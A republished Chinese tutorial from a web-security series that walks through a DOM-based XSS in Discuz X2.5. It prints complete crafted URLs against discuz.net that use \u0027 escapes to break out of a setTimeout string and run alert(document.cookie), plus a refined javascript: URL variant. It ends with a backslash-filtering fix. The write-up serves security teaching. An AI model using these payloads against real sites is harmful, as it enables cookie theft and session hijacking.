13. Dom Xss实例 [Discuz X2.5]

最新推荐文章于 2024-03-27 10:18:06 发布
最新推荐文章于 2024-03-27 10:18:06 发布
阅读量748 收藏
点赞数
分类专栏: 那些年我们一起学XSS(腾讯实例)
原文链接:http://www.pkav.net
版权

作者:心伤的瘦子

来自:PKAV技术宅社区

网址:http://www.pkav.net

-------------------------------------------------

简要描述:

我们教程的DOM XSS就到这里了。最后再给大家送上一个实例。希望大家能够体会到:XSS的上下文非常重要,如何结合上下文,利用未过滤字符,合理的构造,才是成功的关键。

哎,近几天相信别人有世界末日,跑到一个方舟里避难去了。结果3天过后,我发现世界还是如此的精彩,如此的辉煌,我就又出来了。咱们继续。

这年头,码字不容易,求月票。

详细说明:

1.我们直接看实例点。

http://www.discuz.net/connect.php?receive=yes&mod=login&op=callback&referer=aaaaaaaaaaa&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802

2. 可以看到我们的aaaaaaaaaa在源代码里有2处输出。

3. 看第2处,我们需要用双引号闭合,但是显然dz不会给我们这么明显的机会,被拦截了。

4. 我们把目光放在第一处,这一处很特殊,位于setTimeout函数的第一个参数里,setTimeout的第一个函数会将字符串作为脚本来执行。

我们把这一部分代码提取出来。

<script type="text/javascript" reload="1">
setTimeout("window.location.href='http://www.discuz.net/./aaaaaaaaaaa';",2000);
</script>

我们首先能想到的是闭合掉 单引号, 但是这里单引号已经被过滤了。

5. 那么是不是就没有办法了呢?我们可以看到setTimeout的第一个参数是字符串;我们前面的教程里说过一次,JS字符串中,字符还可以表示为unicode的形式。即:单引号还可以表示为\u0027或\x27。带着这个想法,我们可以试试\有没有被过滤。

幸运的是,这里还真没过滤 \

6. 接着我们就是构造代码了。

首先写好代码:

<script type="text/javascript" reload="1">
setTimeout("window.location.href='http://www.discuz.net/./a';alert(document.cookie);a='';", 2000);
</script>

将里面的引号变为\u0027

<script type="text/javascript" reload="1">
setTimeout("window.location.href='http://www.discuz.net/./a\u0027;alert(document.cookie);a=\u0027';", 2000);
</script>

代入到URL里。

http://www.discuz.net/connect.php?receive=yes&mod=login&op=callback&referer=a\u0027;alert(document.cookie);a=\u0027&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802

可以看到弹出了cookies。

7. 其实这里存在一个问题。 这段JS代码里,第一句是location.href="某个地址"; 上面我们所演示的,是一个alert,暂停了location.href的发生。

如果我们把 alert(document.cookie); 换成插入某个JS文件的脚本代码,就会出现问题。

即:JS文件还没来得及加载,location.href="某个地址"; 这句就会被执行,从而跳转到另外一个页面了,继而导致失效。

8. 所以这里,我们有必要改进下执行JS的办法。如下,

我们可以直接让代码变成执行 location.href="javascript:alert(document.cookie)";

location.href='原来的字符串'.替换(所有字符,"新的字符");

<script type="text/javascript" reload="1">
setTimeout("window.location.href ='http://www.discuz.net/./a'.replace(/.+/,/javascript:alert(document.cookie)/.source);//';", 2000);
</script>

同上,替换单引号,加号什么的。

<script type="text/javascript" reload="1">
setTimeout("window.location.href ='http://www.discuz.net/./a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//';", 2000);
</script>

最后利用代码。
http://www.discuz.net/connect.php?receive=yes&mod=login&op=callback&referer=a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802

可以看到,效果一样,这次就不会发生跳转从而导致加载JS失败咯。

9. 可以看到,这个实例,和前面DOM XSS入门时的例子其实本质上是一样的,不过输出最终进入的函数或者javascript语句不一样。

漏洞证明:

见详细说明

修复方案:

过滤掉 \

 

红烧兔纸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Discuz_X2.5_SC_UTF8.zip
07-10
《搭建Discuz X2.5 SC UTF8论坛的详尽指南》 Discuz! X2.5 SC UTF8是一款由Comsenz公司开发的社区论坛软件,它以其强大的功能、丰富的扩展性和良好的用户体验,深受广大网站管理员的喜爱。该版本是Discuz! X2系列的...
XSS技巧拓展】————30、DOM XSS的三种常见案例介绍
Fly_鹏程万里
01-24 1712
在我们的认知中,最常见的XSS(Cross-Site Scripting,跨站点脚本)类型是基于源代码的,这意味着注入的JavaScript代码来自服务器端并在客户端执行。 但还有另一种主要类型,即基于DOM的类型,其中注入的恶意输入不是通过反射或存储方式从服务器发出的:XSS是由本地JavaScript代码在客户端生成的。 基于DOMXSS也有反射和存储子类型的功能,非常类似于基于源的...
DOMXSS 攻击演示(附链接)
Flag少侠的博客
01-25 2747
DOMXSS 攻击演示(附链接)
Low 级别 DOMXSS 攻击演示(附链接)
最新发布
Flag少侠的博客
03-27 492
发现 URL 参数发生变化,English 直接作为参数,推测没有做任何防护,发现 URL 参数发生变化,English 直接作为参数,推测没有做任何防护
3-4DomXSS详解以及演示
山兔的博客
04-21 3492
学习DOMXSS前,先搞清楚什么是DOM 通过 JavaScript,可以重构整个 HTML 文档。您可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript 就需要获得对HTML 文档中所有元素进行访问的入口。这个入口,连同对 HTML 元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以,你可以把DOM理解为一个可以访问HTML的标准编程接口。 举个栗子来理解一下DOM <html><head> <sc
DOMXSS讲解及演示
liguangyao213的博客
12-22 896
这里实验使用的是:pikachu靶场:area39/pikachu 可以直接使用 docker pull area39/pikachu 下载容器,并启动,也可以使用小编的靶场练习,小编靶场地址:​​http://150.158.23.229:8000/​​ 原理:用户请求一个包含JavaScript的特殊URL,会由攻击者提交。然后服务器响应里不会包含攻击者的脚本,当用户的浏览器处理该响应时,这段攻击代码被前端JS里的DOM处理操作引发。基于DOMXSS是不需要与服务器交互的,只发生在客...
JQuery Dom XSS探测.html
05-15
可以直接测试网站里面的JQuery本地弹窗xss,属于渗透测试项一部分,此项目在xss中也属于高危,只需要替换里面的带测试链接即可。
ThinkPHP2.x防范XSS跨站攻击的方法
10-23
下面我们将深入探讨ThinkPHP2.x防范XSS跨站攻击的方法,并提供实例分析。 首先,我们要理解XSS攻击的基本原理。攻击者通常通过构造特殊URL,将包含JavaScript代码的字符串注入到网页中,当用户访问这个被注入的URL...
Discuz-X2.5-SC-UTF8
09-24
X2.5 SC UTF8在开发过程中注重代码的安全性和可维护性,内置了一些安全机制,如SQL防注入、XSS防护等。此外,还提供缓存优化、数据库优化等工具,帮助管理员提升论坛运行效率,降低服务器负载。 四、移动适配 ...
springboot2.x使用Jsoup防XSS攻击的实现
10-15
SpringBoot 2.x 使用 Jsoup 防XSS攻击的实现主要是为了保护应用程序免受跨站脚本(Cross-Site Scripting,简称XSS)的威胁。XSS攻击是一种常见且危害极大的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意...
discuz X25 某功能存在 xss漏洞以及解决方案
09-28
discuz X25 某功能存在 xss漏洞 html 脚本未过滤
实验24:domxss详解及多种场景演示
qq_44720671的博客
04-15 2621
什么是dom? 举个例子来理解一下dom 我们直接进入w3school这个网站来查看dom实例 我们点开 这边就是一段纯html的代码 我们再把它原有的java script代码放回去 这段代码就是对x进行一个getElementById的赋值,当你点击这个标题的时候,他会把值转给function,然后就会弹出一个这是标题的框 这一整个过程都是在前端进行的,没有与后台进行交互,所以...
漏洞篇之DOMxss
weixin_46446401的博客
03-03 8252
介绍了domxss的原理和特点,并讲解了pikachu这个靶场的例子
关于DOMXSS的深入解析(收藏)
告白的博客
01-11 1万+
很多初次接触xss的小白,尽管知道xss的三种分类,但是在DOMxss还是存在理解上的不足,这篇文章希望能帮助到更好的理解DOMxss
DOM XSS案例总结
zaqwescsdn的博客
07-09 2199
1.JS输出部分在页面中可见<div id="d1"> Ni Hao </div> <script> document.getElementById("d1").innerHTML="<img src=1 onerror=alert(1)>" </script>这样ID为d1的标签中的内容就变为了: 其中<>和空格可以用JSUnicode||JS Hex 16||JS Hex 8 多种方法替换。替
DVWA之DOM XSS(DOM型跨站脚本攻击)
谢公子的博客
10-03 2万+
目录 Low Medium High Impossible Low 源代码: &lt;?php # No protections, anything goes ?&gt; 从源代码可以看出,这里low级别的代码没有任何的保护性措施! 页面本意是叫我们选择默认的语言,但是对default参数没有进行任何的过滤 所以我们可以构造XSS代码,访问链接: http://127...
关于DOMXSS漏洞的学习笔记
热门推荐
Mi1k7ea
03-05 4万+
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个
DOM型的xss漏洞利用
qq_43814486的博客
04-22 1万+
DOM:通过JavaScript,可以重构整个HTML文档,就是说可以添加,移除等等,对页面的某个东西进行操作时,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM,所以在DOM型的xss漏洞利用中,DOM可以看成是一个访问HTML的标准程序接口。 特征:整个过程都是在前端完成的,没有后端的参与(纯前端的操作!) 原理: 上图var str = docume...
DomXSS以及绕过浏览器检测机制方法总结
安全汪
06-27 8926
今天继续研究了一下PKAV“心伤的瘦子”的XSS系列教程,收获挺大的,这里主要记录下来,以备忘记! 下面是这个系列教程的截图,可以在这里看到,当让,每一个知识知识点,都可以在这里(传送门)得到复现。作为程序员,会让你意思到自己以前的编码方式中有诸多的不足,作为安全研究者,深深地感觉到,原来还可以这么玩….昨天的知识点忘记整理了,先吧今天的写上,以后再补: **DOM_XSS之iframe标签的变
window.location.href造成DOM XSS怎么解决
08-23
要解决由`window.location.href`引起的 DOM XSS(跨站脚本攻击),可以采取以下几种方法: 1. 输入验证和过滤:对于用户提供的输入,特别是来自不可信源的输入,应使用输入验证和过滤来确保只接受预期的数据。例如,可以使用合适的正则表达式对 URL 进行验证,并过滤掉可能引起安全问题的部分。 2. 输出编码:在将用户输入插入到 DOM 中时,确保进行适当的输出编码。这可以防止输入被解释为代码,并且会转义特殊字符,使其无法执行。 3. 使用安全的跳转方法:`window.location.href`是一种直接将浏览器重定向到新 URL 的方法,但它也可能导致安全问题。为了更安全地进行跳转,可以使用其他跳转方法,如`window.location.replace(url)`或`window.location.assign(url)`,它们不会将当前页面的 URL 添加到历史记录中。 4. Content Security Policy (CSP):CSP 是一种安全机制,通过限制允许加载和执行的资源来减少跨站脚本攻击的风险。使用 CSP 可以配置白名单,只允许加载来自特定域的资源。 5. 更新浏览器和框架版本:及时更新浏览器和使用的框架版本,以获取最新的安全修复和功能改进。 以上方法是常见的用于解决由`window.location.href`引起的 DOM XSS 的一些措施。然而,安全性取决于具体的环境和实现,建议根据具体情况采取适当的安全防护措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值